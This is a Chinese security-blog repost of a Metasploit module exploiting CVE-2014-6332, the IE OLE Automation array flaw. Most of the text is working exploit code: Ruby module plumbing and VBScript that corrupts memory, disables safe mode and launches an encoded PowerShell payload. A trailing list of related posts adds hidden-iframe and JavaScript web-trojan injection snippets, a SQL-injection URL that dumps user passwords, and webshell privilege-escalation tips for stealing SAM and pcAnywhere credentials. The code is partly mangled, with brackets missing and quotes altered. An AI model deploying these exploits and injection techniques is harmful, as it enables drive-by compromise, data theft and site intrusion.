中国寒龙出品-Windows IE浏览器OLE自动化阵远程执行代码漏洞

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require ‘msf/core‘

require ‘msf/core/exploit/powershell‘

class Metasploit4 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::BrowserExploitServer

include Msf::Exploit::Remote::BrowserAutopwn

include Msf::Exploit::Powershell

autopwn_info({

:ua_name => HttpClients::IE,

:ua_minver => "3.0",

:ua_maxver => "10.0",

:javascript => true,

:os_name => OperatingSystems::Match::WINDOWS,

:rank => ExcellentRanking

})

def initialize(info={})

super(update_info(info,

‘Name‘ => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",

‘Description‘ => %q{

This module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332.

The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.

Powershell is required on the target machine. On Internet Explorer versions using Protected Mode,

the user has to manually allow powershell.exe to execute in order to be compromised.

‘License‘ => MSF_LICENSE,

‘Author‘ =>

[

‘Robert Freeman‘, # IBM X-Force

‘yuange‘, # twitter.com/yuange75

‘Rik van Duijn‘, # twitter.com/rikvduijn

‘Wesley Neelen‘, # security[at]forsec.nl

‘GradiusX <francescomifsud[at]gmail.com>‘,

‘b33f‘, # @FuzzySec

‘References‘ =>

[

[ ‘CVE‘, ‘2014-6332‘ ],

[ ‘MSB‘, ‘MS14-064‘ ],

[ ‘OSVDB‘, ‘114533‘ ],

[ ‘EDB‘, ‘35229‘ ],

[ ‘EDB‘, ‘35308‘ ],

[ ‘URL‘, ‘http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows‘ ],

[ ‘URL‘, ‘https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module‘ ]

‘Platform‘ => ‘win‘,

‘Targets‘ =>

[

[ ‘Windows x86‘, { ‘Arch‘ => ARCH_X86 } ],

‘BrowserRequirements‘ =>

{

:source => /script|headers/i,

:ua_name => HttpClients::IE,

:os_name => /win/i,

:arch => ‘x86‘,

:ua_ver => lambda { |ver| ver.to_i.between?(4, 10) }

‘DefaultOptions‘ =>

{

‘HTTP::compression‘ => ‘gzip‘

‘Payload‘ =>

{

‘BadChars‘ => "\x00"

‘Privileged‘ => false,

‘DisclosureDate‘ => "Nov 13 2014",

‘DefaultTarget‘ => 0))

register_options(

[

OptBool.new(‘TRYUAC‘, [true, ‘Ask victim to start as Administrator‘, false]),

], self.class )

end

def vbs_prepare()

code = %Q|

dim aa()

dim ab()

dim a0

dim a1

dim a2

dim a3

dim win9x

dim intVersion

dim rnda

dim funclass

dim myarray

Begin()

neline

function Begin()

On Error Resume Next

info=Navigator.UserAgent

if(instr(info,"Win64")>0) then

exit function

end if

if (instr(info,"MSIE")>0) then

intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))

else

exit function

end if

win9x=0

BeginInit()

If Create()=True Then

myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)

myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if(intVersion<4) then

document.write("<br> IE")

document.write(intVersion)

runshellcode()

else

setnotsafemode()

end if

end function

function BeginInit()

Randomize()

redim aa(5)

redim ab(5)

a0=13+17*rnd(6)

a3=7+3*rnd(5)

end function

function Create()

On Error Resume Next

dim i

Create=False

For i = 0 To 400

If Over()=True Then

‘ document.write(i)

Create=True

Exit For

End If

end function

sub testaa()

end sub

function mydata()

On Error Resume Next

i=testaa

i=null

redim Preserve aa(a2)

ab(0)=0

aa(a1)=i

ab(0)=6.36598737437801E-314

aa(a1+2)=myarray

ab(2)=1.74088534731324E-310

mydata=aa(a1)

redim Preserve aa(a0)

end function

function setnotsafemode()

On Error Resume Next

i=mydata()

i=readmemo(i+8)

i=readmemo(i+16)

j=readmemo(i+&h134)

for k=0 to &h60 step 4

j=readmemo(i+&h120+k)

if(j=14) then

j=0

redim Preserve aa(a2)

aa(a1+2)(i+&h11c+k)=ab(4)

redim Preserve aa(a0)

j=0

j=readmemo(i+&h120+k)

Exit for

end if

ab(2)=1.69759663316747E-313

runaaaa()

end function

function Over()

On Error Resume Next

dim type1,type2,type3

Over=False

a0=a0+a3

a1=a0+2

a2=a0+&h8000000

redim Preserve aa(a0)

redim ab(a0)

redim Preserve aa(a2)

type1=1

ab(0)=1.123456789012345678901234567890

aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then

if(intVersion<4) then

mem=cint(a0+1)*16

j=vartype(aa(a1-1))

if((j=mem+4) or (j*8=mem+8)) then

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

else

redim Preserve aa(a0)

exit function

end if

else

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

If(type1=&h2f66) Then

Over=True

End If

If(type1=&hB9AD) Then

Over=True

win9x=1

End If

redim Preserve aa(a0)

end function

function ReadMemo(add)

On Error Resume Next

redim Preserve aa(a2)

ab(0)=0

aa(a1)=add+4

ab(0)=1.69759663316747E-313

ReadMemo=lenb(aa(a1))

ab(0)=0

redim Preserve aa(a0)

end function

end

def get_html()

if datastore[‘TRYUAC‘]

tryuac = ‘runas‘

else

tryuac = ‘open‘

end

payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })

payl.slice! "powershell.exe "

prep = vbs_prepare()

html = %Q|

<!doctype html>

<html>

<body>

function runaaaa()

On Error Resume Next

set shell=createobject("Shell.Application")

shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0

end function

</script>

#{prep}

</script>

</body>

</html>

end

def on_request_exploit(cli, request, target_info)

print_status("Requesting: #{request.uri}")

send_exploit_html(cli, get_html())

end

时间： 2024-08-08 21:55:28

中国寒龙出品-Windows IE浏览器OLE自动化阵远程执行代码漏洞的相关文章

网页挂马大全集 -中国寒龙出品转载写明出处www.hackerschina.org

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCR

Microsoft Windows 远程桌面服务远程执行代码漏洞(CVE-2019-0708)

Windows是一款由美国微软公司开发的窗口化操作系统. 当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞.此漏洞是预身份验证,无需用户交互. <*来源:Microsoft 链接:https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-0708 *> 解决办法厂商补丁: Microsoft --------- M

webshell提权技巧 -中国寒龙出品关注网络安全

web)权限终极9技巧当我们取得一个webshell时候,下一部要做的就是提升权限个人总结如下:1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆2.C:\WINNT\system32\config\进这里下它的SAM,破解用户的密码用到破解sam密码的软件有LC,SAMinside3.C:\Doc

中国寒龙出品 -最土团购系统通用SQL注入漏洞 WWW.HACKERSCHINA.ORG

基础函数过滤不全导致注射. ajax/coupon.php exp: 1 ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/wher

Cisco IOS及IOS XE Software DHCPv6拒绝服务漏洞 -中国寒龙出品

受影响系统:Cisco IOS 15.xCisco IOS XE 3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70140CVE(CAN) ID: CVE-2014-3359 Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统. Cisco IOS 15.0, 15.1, 15.2, 15.4.IOS XE 3.3.xSE,

Cisco IOS拒绝服务漏洞 -中国寒龙出品

受影响系统:Cisco IOS 15.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 70129CVE(CAN) ID: CVE-2014-3361 Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统. Cisco IOS 15.0, 15.1, 15.2, 15.4没有正确通过NAT实现SIP,在实现上存在远程拒绝服务漏洞,攻击

08cms家园系统源码注入漏洞 -中国寒龙出品

# Title :08cms家园系统注入漏洞# Team :08 Security Team# Author :08安全团队# 首发 : 08安全团队#######################################这个漏洞在5月份已经审计出来了,现在将漏洞放出来.注册一个账号会员资料->基本资料查看表单得到自己的 MID在真实姓名填写 \头像填写 1 ,company=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members l

[中国寒龙联盟出品]C语言基础知识视频教程第一课-C语言简史，特点，基本结构，函数printf（）和scanf()使用和c语言的开发过程。

本视频由中国寒龙收集整理发布,更多请关注我们的博客和,我们的官网:www.hackerschina.org 感谢朋友们的支持!

利用谷歌实现批量入侵的方法 -中国寒龙

route print 查看本机设置网络 intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:动网.将返回所有在网页正文部分包含"动网"的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含"安全天使"的网页.同理allintitle:也同intitle类似. ca